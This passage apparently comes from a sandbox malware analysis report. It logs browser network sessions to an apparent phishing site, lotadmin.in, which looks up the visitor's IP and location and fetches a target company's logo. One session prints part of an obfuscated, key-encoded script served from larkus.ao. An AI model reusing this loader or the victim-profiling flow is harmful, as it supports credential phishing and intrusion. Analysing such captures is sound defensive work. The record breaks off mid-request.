                                                                                        2024-12-09 16:47:09 UTC1369INData Raw: 8f f8 19 bf e4 d7 fc 9e 5d d9 9d 3d d9 9b 7d d9 9f 43 38 92 63 38 8e 93 19 f9 17 ff 11 47 b2 4b 4e 29 20 85 a4 a4 94 95 2a 52 4d 6a 49 0b 69 2d ed a4 93 f4 90 7e 32 50 86 c9 28 99 22 d3 64 9e ac 90 35 b2 5e 36 cb 76 d9 2f 07 e5 b8 9c 96 b3 72 51 ae c9 4d 79 28 4f e5 85 bc 96 b7 f2 41 be 8a 8b b8 89 87 04 48 8c 24 49 aa a0 18 11 f9 6d d3 da 4c 36 ab cd 66 b3 db 1c 36 b7 cd 6b 0b da c2 b6 aa ad 65 5b da ae b6 bb ed 6d fb d9 71 76 86 5d 62 57 d8 b5 76 93 dd 63 0f d9 37 f6 bb f5 b7 d1 f6 ff ff ff 8e e3 94 71 ca 39 55 9d da 4e 73 67 8c 33 d6 19 e7 8c 77 26 38 13 9d 7d f4 8c 86 84 6d 08 3b 74 46 91 e1 75 c2 9b 1c 9f a3 d3 95 69 dd f9 bc 9d a2 a6 47 2d 8c 5a 1a b5 3b ea b2 72 54 3a 95 5e 65 54 99 54 ee d2 5e 68 9f 32 aa b5 6a 33 d5 49 f5 6e 8d 3e ef a9 6a b6 5a
                                                                                        Data Ascii: ]=}C8c8GKN) *RMjIi-~2P("d5^6v/rQMy(OAH$ImL6f6ke[mqv]bWvc7q9UNsg3w&8}m;tFuiG-Z;rT:^eTT^h2j3In>jZ
                                                                                        2024-12-09 16:47:09 UTC1369INData Raw: 22 22 8c 66 34 a3 19 cd 68 46 33 9a d1 63 ff 35 f8 17 bc e2 1f 17 ad 21 df 39 cb 70 db c4 26 ce 73 9e 5c 72 79 44 01 25 bc e1 b2 1d b3 74 ae f2 9f a9 4c 67 32 53 ad ba 55 b7 fa ac a6 3e ab 19 69 23 d9 c4 26 9e b0 83 d6 b4 b6 be 94 a7 21 b5 a9 48 4d 4a f3 99 22 4a 53 5a 7f b2 c7 4a d3 19 61 aa fe a5 35 2d d9 48 43 1b 6a 3d 99 68 3d a9 6a 6d ad ab b5 b7 b2 56 d5 ca 5b 79 ab 6a a9 b4 67 35 4b 59 ca 35 6e 71 8b 22 4a 28 d1 4c 26 32 90 fe f4 e5 09 d7 b8 c5 35 8a c8 a3 88 54 a6 ea 09 6e 68 91 be a0 37 bd e9 4d 47 7a d2 9e ee 74 d7 f7 fa 96 ce 54 64 0b cf 28 e1 9a 5e e4 2a fb b8 c1 65 4e 68 b6 66 6a ba de d3 4c 4e 52 93 9a f4 65 0f 3b b4 bf f6 d5 be da 9b 5d 1c 0a 9f a9 4f 5d 6d 4f f5 f0 39 7c 0c 8f c2 03 ad 1d 9e e9 54 26 d2 94 86 54 a4 33 1d 75 8f ba 88 88 88
                                                                                        Data Ascii: ""f4hF3c5!9p&s\ryD%tLg2SU>i#&!HMJ"JSZJa5-HCj=h=jmV[yjg5KY5nq"J(L&25Tnh7MGztTd(^*eNhfjLNRe;]O]mO9|T&T3u
                                                                                        2024-12-09 16:47:09 UTC1369INData Raw: d8 93 7a 3a 72 30 f5 2c b8 80 7a 0e ca 61 d4 0b e1 1b ea 45 88 b9 a8 17 23 7e a0 5e 82 f8 91 7a 29 e2 27 ea 65 88 ef a8 97 23 7e a6 5e 81 f8 9e 7a 25 e2 17 ea 55 88 5f a9 57 23 d6 a1 5e a3 c1 de 0c 88 df a8 f7 21 9e a5 de 8f dc 9b fa a8 8e 4b fb 18 a0 bc 4e 7d 1c e5 1f ea 07 88 69 a9 5f a1 3c 4b fd 1a f9 21 7a 68 ba df d1 37 0b d3 fd 85 ce 9b 4c f7 6f 59 e5 d1 d2 5b a3 4c e1 0f e4 ce d4 55 df f6 dd 7a ce f6 03 ca 51 d4 43 51 e6 a5 1e 86 ce a7 d4 c3 51 8d a2 1e 81 6a 6c ea d1 a8 56 a3 1e 13 9d ed a8 c7 42 67 5b ea b1 e1 02 ea 71 f4 6d c7 05 b8 90 7a 3c 0d 76 52 40 e7 46 ea 29 d1 79 81 7a 0e e8 a7 5e 1a d5 52 d4 cb 6a b0 2b 83 e6 6b 57 05 54 4b 50 af 05 e3 50 af ad 6f bb 0e 2c f8 7b 22 65 bd 1e e8 db 6e 0d 70 26 f5 39 30 88 fa 5c e8 51 9f 87 ea 3b 66 98 1b
                                                                                        Data Ascii: z:r0,zaE#~^z)'e#~^z%U_W#^!KN}i_<K!zh7LoY[LUzQCQQjlVBg[qmz<vR@F)yz^Rj+kWTKPPo,{"enp&90\Q;f
                                                                                        2024-12-09 16:47:09 UTC1369INData Raw: 98 8d 7c 40 d3 3e 48 c4 ec e4 43 9a f6 11 26 38 83 7c 94 7c 8c 98 83 7c 1c 0d 63 4e f2 69 f2 25 62 2e f2 15 f2 75 62 21 f2 0d 24 c4 5e e4 fb e4 07 c4 62 e4 97 40 2c 41 7e 8d 58 92 fc 0e b1 14 f9 63 c3 58 9a fc 95 4c 62 19 b2 27 7f 23 96 23 ff 04 62 05 f2 bf 9a 58 91 16 b4 41 47 eb 87 b4 61 b4 91 c4 6a b4 89 88 58 8b 36 0d 62 6d da 6c 35 ee a4 cd 4d 9b e7 38 4b 5f 5b 87 b6 7e 4e 50 b6 0d 2f 88 8d 68 9b 24 c4 c6 b4 cd 68 9b 13 9b d0 0e 05 ba 85 69 87 25 74 8b d0 8e a2 1d 4d 6c 46 3b 05 88 2d 68 57 d6 c4 96 b4 87 68 0f e7 ee 65 7b 94 88 6d 68 4f 22 b6 a5 3d 9b 10 db d1 5e a4 bd 44 6c 4f 7b 15 88 1d 69 1f 22 76 a2 7d 82 d8 99 f6 25 62 17 da 8f 09 b1 2b ed 2f da df c4 6e b4 7f 81 01 e7 d1 fe 47 ec 41 0d 46 ec 49 8d 85 d8 8b 9a 0c b1 37 35 45 42 ec 43 cd 46 cd
                                                                                        Data Ascii: |@>HC&8|||cNi%b.ub!$^b@,A~XcXLb'##bXAGajX6bml5M8K_[~NP/h$hi%tMlF;-hWhe{mhO"=^DlO{i"v}%b+/nGAFI75EBCF
                                                                                        2024-12-09 16:47:09 UTC1369INData Raw: 0b 65 fa 5d c2 3c 28 b3 ef 12 e6 43 99 77 97 b0 00 ca ba bb 84 85 50 76 dc 25 2c 82 b2 df 35 0c 8b a1 1c 00 e5 20 08 4b a0 1c 06 e5 70 08 cb a1 1c 09 e5 18 08 2b a1 9c 86 bb 84 b5 50 ce d9 44 58 07 e5 51 28 8f 41 58 0f e5 45 dc 25 6c 84 f2 de 5d c2 26 28 5f dd c5 35 84 f2 bf 25 6c 46 bf 1d 62 c5 83 62 65 2b c1 a3 58 c3 8a 1f 86 62 4d 2b 7e 38 8a b5 ac f8 11 28 d6 b6 a2 86 28 36 b1 a2 cb 51 6c 63 c5 0d 46 b1 a3 15 ff 2f 8a 9d ac f8 bf 51 ec 61 25 4c 42 b1 8f 15 f7 28 8a 7d ad e8 1e 14 07 de 85 30 0d 45 2b aa 80 e2 4c 2b fe 48 14 67 51 59 6d a6 95 30 19 c5 ad 56 7c 5b 14 f7 b4 e2 26 a0 b8 8f 15 f7 0c 8a fb 5a f1 43 51 3c cc 0a 5f a3 78 b8 15 bd 8b e2 19 56 74 23 8a e7 58 71 0f a3 78 9e 15 b7 15 c5 8b ad 70 16 8a 97 58 d1 21 28 5e 63 85 eb 51 bc d6 8a fb 1f
                                                                                        Data Ascii: e]<(CwPv%,5 Kp+PDXQ(AXE%l]&(_5%lFbbe+XbM+~8((6QlcF/Qa%LB(}0E+L+HgQYm0V|[&ZCQ<_xVt#XqxpX!(^cQ
                                                                                        2024-12-09 16:47:09 UTC1369INData Raw: 59 d5 d3 8a 19 0a cd 56 a2 02 0a 43 ad d8 74 14 b6 b1 62 33 50 98 6c c5 46 a2 30 c5 4a a2 11 85 a9 56 12 4d 28 4c b3 12 4d 43 61 81 95 e8 08 14 96 5a 49 8c 46 61 b9 95 44 11 85 35 56 12 93 51 38 d4 4a f4 36 0a e7 59 e1 14 14 ae b4 62 df a2 70 8b 15 fb 05 85 87 ac d8 29 28 3c 6a c5 8e 41 e1 35 2b ba 0e 85 2f ad d8 69 28 7c 45 b2 50 df d3 8a bd 82 c2 4f 56 b4 37 0a 3f 5b 89 ee 40 e1 57 2b d1 a5 28 fc 66 45 a7 a2 f0 87 15 1d 80 c2 9f 56 ac 88 c2 df 56 f8 13 85 7f ac 68 2a 0a c1 4a f4 19 0a 5b ad d8 df 28 fc 6f 85 59 28 f4 5b b1 08 55 0e b7 12 9d 83 2a 47 58 d1 14 54 39 ce 0a 75 a8 72 be 15 7b 17 55 ae b4 62 69 54 79 c4 4a f4 07 aa 3c 5f c2 2e bc 7e c1 bf 3e 06 9e d3 71 7a 8e 5a 1a 69 a5 93 61 a0 ae 64 9c 8c 8b f5 0d f5 0d 5d 7d e5 be 72 71 44 69 44 69 b0 4a
                                                                                        Data Ascii: YVCtb3PlF0JVM(LMCaZIFaD5VQ8J6Ybp)(<jA5+/i(|EPOV7?[@W+(fEVVh*J[(oY([U*GXT9ur{UbiTyJ<_.~>qzZiad]}rqDiDiJ
                                                                                        2024-12-09 16:47:09 UTC1369INData Raw: da 1f b4 cf b9 0d c9 d8 1b 25 63 e7 b7 76 c3 f3 4a 29 50 5c d7 0d c2 b9 38 fc 8e 7d 38 f1 3b 80 31 a1 c7 4f ed 00 8d 65 67 b7 f4 0b 35 9e 26 a0 64 15 a8 e4 fe f6 23 7b ed 4a e5 27 f3 fa 5e 6d 7e ed 53 ca 62 5a 83 14 ad ad fd fb c2 27 8e a4 19 3c 74 e4 f3 ad ad 1d e2 8e 5a 8b cd e5 0f 15 b0 a7 4d 3f 8e d3 f4 68 bf 3c 64 0a 07 a8 8a 7a 08 f9 16 e6 25 ad de e6 18 42 49 18 27 67 d1 34 1b a4 99 a3 3d 35 42 09 fd fc 94 01 58 96 2d ad 66 a9 5f 29 db b6 df 4d ae ac 9e 30 3d 4a 78 d6 c5 a1 7e bd 2d 38 33 ed ac 96 27 49 a9 54 f7 c0 fa c9 b5 ae 7e d5 3b 55 e9 eb c4 a5 a5 4a 19 64 38 a3 80 10 68 e4 d5 f1 4d cc 1b 35 e3 e0 d0 63 87 96 67 9a 5c d3 c8 2f fc 8a 12 2e 01 90 67 99 26 5c 58 cc 1c 9d 0a ce 61 cf 58 4a ca 71 ae 03 c7 cb 9e 57 43 03 74 1a a1 8e 22 a8 87 10 7b
                                                                                        Data Ascii: %cvJ)P\8}8;1Oeg5&d#{J'^m~SbZ'<tZM?h<dz%BI'g4=5BX-f_)M0=Jx~-83'IT~;UJd8hM5cg\/.g&\XaXJqWCt"{


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.549737104.26.13.2054438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:09 UTC545OUTGET /?format=json HTTP/1.1
                                                                                        Host: api.ipify.org
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://lotadmin.in
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://lotadmin.in/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:09 UTC463INHTTP/1.1 200 OK
                                                                                        Date: Mon, 09 Dec 2024 16:47:09 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 21
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Vary: Origin
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8ef679b4a8adc3f3-EWR
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1678&rtt_var=664&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1123&delivery_rate=1606160&cwnd=190&unsent_bytes=0&cid=333ad46595ef8f0c&ts=457&x=0"
                                                                                        2024-12-09 16:47:09 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                                                                        Data Ascii: {"ip":"8.46.123.228"}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.54973865.109.232.1064438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:09 UTC353OUTGET /animal/script.js HTTP/1.1
                                                                                        Host: www.larkus.ao
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:10 UTC375INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        content-type: text/javascript
                                                                                        last-modified: Fri, 06 Dec 2024 13:37:11 GMT
                                                                                        accept-ranges: bytes
                                                                                        content-length: 12802
                                                                                        date: Mon, 09 Dec 2024 16:47:09 GMT
                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                        2024-12-09 16:47:10 UTC993INData Raw: 76 61 72 20 6b 65 79 20 3d 20 22 73 65 63 72 65 74 6b 65 79 22 3b 0a 76 61 72 20 65 6e 63 6f 64 65 64 53 63 72 69 70 74 20 3d 20 22 46 77 6f 41 42 77 67 52 42 52 46 58 45 67 45 48 4e 78 4d 52 42 52 45 31 47 68 59 58 46 77 73 52 47 55 31 65 4e 79 6f 75 4d 51 6f 61 48 77 41 58 42 79 6b 4d 45 77 45 52 44 30 4a 56 55 30 31 4b 55 6c 68 4b 53 78 35 7a 55 30 56 44 55 67 6b 52 48 30 55 59 42 68 45 4d 46 52 63 56 43 51 63 63 46 79 41 4f 45 77 77 59 53 31 68 5a 56 45 4a 59 65 45 56 55 53 30 55 61 48 41 73 51 42 6b 55 64 47 43 67 57 45 51 77 50 46 30 56 4a 53 30 6f 51 49 77 30 4d 48 41 41 49 41 6a 55 59 46 78 6b 4b 49 67 6f 51 46 79 51 58 46 78 63 4d 47 77 46 62 41 6b 73 4e 46 68 59 58 57 67 73 56 48 51 77 65 45 68 45 4d 41 45 73 42 47 41 41 4c 4d 67 49 47 48 42 46
                                                                                        Data Ascii: var key = "secretkey";var encodedScript = "FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0VDUgkRH0UYBhEMFRcVCQccFyAOEwwYS1hZVEJYeEVUS0UaHAsQBkUdGCgWEQwPF0VJS0oQIw0MHAAIAjUYFxkKIgoQFyQXFxcMGwFbAksNFhYXWgsVHQweEhEMAEsBGAALMgIGHBF
                                                                                        2024-12-09 16:47:10 UTC11809INData Raw: 67 45 6d 48 77 51 64 42 31 35 7a 55 30 56 44 55 6b 56 55 53 30 55 45 55 77 59 43 42 67 59 63 53 30 30 63 57 6b 55 59 65 45 56 55 53 30 56 5a 55 30 56 44 55 6b 56 55 53 78 49 51 48 51 45 4d 42 55 73 59 42 41 59 59 42 77 77 4d 48 45 73 63 47 51 41 66 55 31 68 44 56 51 51 57 42 42 41 4e 53 51 63 50 45 77 73 66 54 46 35 7a 55 30 56 44 55 6b 56 55 53 30 56 5a 55 30 56 44 41 41 41 41 48 68 63 58 55 30 4a 45 53 57 39 55 53 30 56 5a 55 30 56 44 55 68 68 2b 53 30 56 5a 55 78 68 70 65 45 56 55 53 30 56 57 58 45 55 6b 46 78 46 55 44 77 6f 55 45 67 77 4e 55 67 4d 47 42 41 68 5a 46 67 67 43 47 77 6c 2b 53 30 56 5a 55 77 4d 57 48 41 59 41 41 67 6f 58 55 77 49 47 42 69 45 62 42 67 51 51 48 53 4d 52 48 51 67 78 42 67 51 51 48 30 30 47 48 77 51 64 42 30 78 5a 43 47 39 44
                                                                                        Data Ascii: gEmHwQdB15zU0VDUkVUS0UEUwYCBgYcS00cWkUYeEVUS0VZU0VDUkVUSxIQHQEMBUsYBAYYBwwMHEscGQAfU1hDVQQWBBANSQcPEwsfTF5zU0VDUkVUS0VZU0VDAAAAHhcXU0JESW9US0VZU0VDUhh+S0VZUxhpeEVUS0VWXEUkFxFUDwoUEgwNUgMGBAhZFggCGwl+S0VZUwMWHAYAAgoXUwIGBiEbBgQQHSMRHQgxBgQQH00GHwQdB0xZCG9D


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.54974013.227.8.724438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:10 UTC563OUTGET /cherokeebrick.com?size=400 HTTP/1.1
                                                                                        Host: logo.clearbit.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://lotadmin.in
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://lotadmin.in/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:11 UTC548INHTTP/1.1 200 OK
                                                                                        Content-Type: image/png
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        access-control-allow-origin: *
                                                                                        Cache-Control: public, max-age=2592000
                                                                                        Date: Mon, 09 Dec 2024 16:47:10 GMT
                                                                                        x-envoy-response-flags: -
                                                                                        Server: Clearbit
                                                                                        strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                                        x-content-type-options: nosniff
                                                                                        X-Cache: Miss from cloudfront
                                                                                        Via: 1.1 c0f6d569dc3603537a21705f48d93398.cloudfront.net (CloudFront)
                                                                                        X-Amz-Cf-Pop: BAH53-C1
                                                                                        X-Amz-Cf-Id: 3QbKxbTvrSkDlJ_ZK_-mhaOOkJ_8fKQwVspG8pg2o7iVRai8aCfA9g==
                                                                                        2024-12-09 16:47:11 UTC16384INData Raw: 34 66 62 32 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 02 00 00 00 22 3a 39 c9 00 00 4f 79 49 44 41 54 78 9c ec 7d 77 54 14 49 d7 f7 e4 21 07 c9 02 82 24 11 01 49 26 30 a0 a8 98 01 15 4c 8b 89 55 30 ae 11 c5 45 51 c4 b4 ca 1a d6 2c 06 c4 2c 82 a0 88 0a a8 64 14 10 15 51 24 e7 30 e4 38 a1 27 7c e7 f3 9e b7 4e bf 83 8f ef 2e c1 c1 67 e7 f7 07 67 e8 e9 a9 ae ee fa f5 ad 5b b7 6e a0 08 04 02 82 18 62 f4 36 48 a2 ee 80 18 ff 9d 10 13 4b 8c 3e 81 98 58 62 f4 09 c4 c4 12 a3 4f 20 26 96 18 7d 02 31 b1 c4 e8 13 88 89 25 46 9f 40 4c 2c 31 fa 04 62 62 89 d1 27 10 13 4b 8c 3e 81 98 58 62 f4 09 c4 c4 12 a3 4f 20 26 96 18 7d 02 31 b1 c4 e8 13 88 89 25 46 9f 40 4c 2c 31 fa 04 62 62 89 d1 27 10 13 4b 8c 3e 81 98 58 62 f4 09 c4 c4 12
                                                                                        Data Ascii: 4fb2PNGIHDR":9OyIDATx}wTI!$I&0LU0EQ,,dQ$08'|N.gg[nb6HK>XbO &}1%F@L,1bb'K>XbO &}1%F@L,1bb'K>Xb
                                                                                        2024-12-09 16:47:11 UTC4026INData Raw: d6 a1 48 31 42 5f 81 e1 14 34 30 bc 21 0a 45 65 81 46 2f f4 13 7c c1 69 ce 57 a0 6f 91 26 d4 8d 7e e2 d5 35 50 37 f1 45 a3 4f 9d 3a 65 65 65 85 0c 57 dd 7a 12 7d 88 7e 47 2c 18 83 4f 9f 3e 69 68 68 a4 a6 a6 0a d9 03 7b 0e a1 c4 1b 40 11 fc 54 82 06 09 9f 47 1e 1d 17 da c3 c6 4f a3 3c 1e 0f 3f c0 e8 95 e8 f6 d2 0c df 13 fc f1 ce ce ce 0f 1f 3e 28 2b 2b 67 67 67 8b 56 43 ff 0e fa 29 b1 b8 5c 6e 70 70 f0 90 21 43 fa a8 68 07 90 00 84 53 d7 1c 2f 4c 26 13 4f 23 a1 85 24 de 84 8b c6 15 6f 5c 40 25 e9 ff 7e 7a d5 ae 40 bf 42 65 fa 91 f7 47 7b 7b fb d0 a1 43 2f 5d ba 84 8c a5 3d 7e 1e bd 8f fe a8 63 01 b8 5c ee 96 2d 5b 72 72 72 62 63 63 7b d7 eb 01 0a 17 0a 65 b0 41 69 70 20 0b 12 be 2e 3c be 90 22 4a 33 01 67 c2 12 92 cb e5 e2 b5 1c a4 51 75 bb 82 ba d0 d5 91
                                                                                        Data Ascii: H1B_40!EeF/|iWo&~5P7EO:eeeWz}~G,O>ihh{@TGO<?>(++gggVC)\npp!ChS/L&O#$o\@%~z@BeG{{C/]=~c\-[rrrbcc{eAip .<"J3gQu
                                                                                        2024-12-09 16:47:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.54974192.249.45.1214438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:11 UTC593OUTGET /favicon.ico HTTP/1.1
                                                                                        Host: lotadmin.in
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://lotadmin.in/due/cigam/index
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:11 UTC629INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        cache-control: public, max-age=604800
                                                                                        expires: Mon, 16 Dec 2024 16:47:11 GMT
                                                                                        content-type: image/x-icon
                                                                                        last-modified: Tue, 22 Oct 2024 03:16:35 GMT
                                                                                        accept-ranges: bytes
                                                                                        content-length: 2367
                                                                                        date: Mon, 09 Dec 2024 16:47:11 GMT
                                                                                        server: LiteSpeed
                                                                                        platform: hostinger
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                        x-xss-protection: 1; mode=block
                                                                                        x-content-type-options: nosniff
                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                        2024-12-09 16:47:11 UTC739INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 01 69 38 b8 27 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 20 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 30 2d 63 30 36 30 20 36 31 2e 31 33 34 37 37 37 2c 20 32 30 31 30 2f 30 32 2f 31 32 2d 31 37 3a 33 32 3a 30 30 20 20
                                                                                        Data Ascii: PNGIHDR22i8'tEXtSoftwareAdobe ImageReadyqe< iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
                                                                                        2024-12-09 16:47:11 UTC1628INData Raw: 37 39 34 30 44 45 44 36 45 36 33 39 46 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 41 46 33 32 41 34 46 30 32 38 33 38 31 31 45 39 38 46 41 37 39 34 30 44 45 44 36 45 36 33 39 46 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e 42 5c 67 6a 00 00 05 b5 49 44 41 54 78 da 62 f8 ff ff 3f 03 12 4e 43 e6 33 82 08 20 00 13 68 80 91 09 44 56 9c 03 b2 16 23 44 ef 7d 81 ca 82 b5 2f 46 e8 54 e2 61 60 d8 ed 0a a6 2b 99 d0 cd ba 1b 08 67 76 c0 2c df fa 1f 13 c0 1d 84 15 00 04 10 03 9a 57 0c 60 6c 16 98 3c 36 2f fc 47 76 3e 94 fd 1f a6 83 c1 75 0f 03 83 b1 10 42 01 5c 22 4d 95 81 21
                                                                                        Data Ascii: 7940DED6E639F" stRef:documentID="xmp.did:AF32A4F0283811E98FA7940DED6E639F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>B\gjIDATxb?NC3 hDV#D}/FTa`+gv,W`l<6/Gv>uB\"M!


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.549744104.26.12.2054438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:11 UTC349OUTGET /?format=json HTTP/1.1
                                                                                        Host: api.ipify.org
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:12 UTC430INHTTP/1.1 200 OK
                                                                                        Date: Mon, 09 Dec 2024 16:47:11 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 21
                                                                                        Connection: close
                                                                                        Vary: Origin
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8ef679c30de74258-EWR
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1779&rtt_var=675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=927&delivery_rate=1611479&cwnd=173&unsent_bytes=0&cid=64c5bfb5e3ab0618&ts=450&x=0"
                                                                                        2024-12-09 16:47:12 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                                                                                        Data Ascii: {"ip":"8.46.123.228"}


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.549742104.26.9.444438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:11 UTC533OUTGET /json/ HTTP/1.1
                                                                                        Host: ipapi.co
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
